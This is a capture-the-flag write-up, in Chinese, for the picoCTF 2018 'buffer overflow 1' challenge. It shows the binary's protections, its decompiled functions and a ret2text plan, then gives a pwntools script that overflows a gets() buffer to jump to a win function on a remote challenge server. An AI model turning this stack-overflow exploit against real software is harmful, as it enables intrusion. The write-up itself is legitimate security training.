picoctf 2018 buffer overflow 1
# picoctf 2018 buffer overflow 1
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/picoctf_2018_buffer_overflow_1/PicoCTF_2018_buffer_overflow_1'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
1
2
3
4
5
6
7
2
3
4
5
6
7
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
__gid_t v3; // ST1C_4
setvbuf(_bss_start, 0, 2, 0);
v3 = getegid();
setresgid(v3, v3, v3);
puts("Please enter your string: ");
vuln();
return 0;
}
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
vuln函数如下
int vuln()
{
int v0; // eax
char s; // [esp+0h] [ebp-28h]
gets(&s);
v0 = get_return_address();
return printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", v0);
}
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
win函数如下
int win()
{
char s; // [esp+Ch] [ebp-4Ch]
FILE *stream; // [esp+4Ch] [ebp-Ch]
stream = fopen("flag.txt", "r");
if ( !stream )
{
puts(
"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
exit(0);
}
fgets(&s, 64, stream);
return printf(&s);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 思路分析
目前信息:
- 存在后门函数
win可打印flag - No canary found
- NX disabled
- No PIE
- Has RWX segments
- 存在后门函数
思路:
- 32位
ret2text
- 32位
# exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
context.terminal = ['tmux', 'splitw', '-h']
pwnfile = '/root/pwn/buuctf/picoctf_2018_buffer_overflow_1/PicoCTF_2018_buffer_overflow_1'
# io = process(pwnfile)
io = remote('node4.buuoj.cn', 27519)
elf = ELF(pwnfile)
padding = 0x28+4
puts_flag_addr = elf.symbols['win']
payload = flat(['a'*padding, puts_flag_addr])
io.sendlineafter('Please enter your string: \n', payload)
io.recvuntil('\n')
print(io.recv())
1
2
3
4
5
6
7
8
9
10
11
12
13
2
3
4
5
6
7
8
9
10
11
12
13
上次更新: 2022/08/15, 00:29:49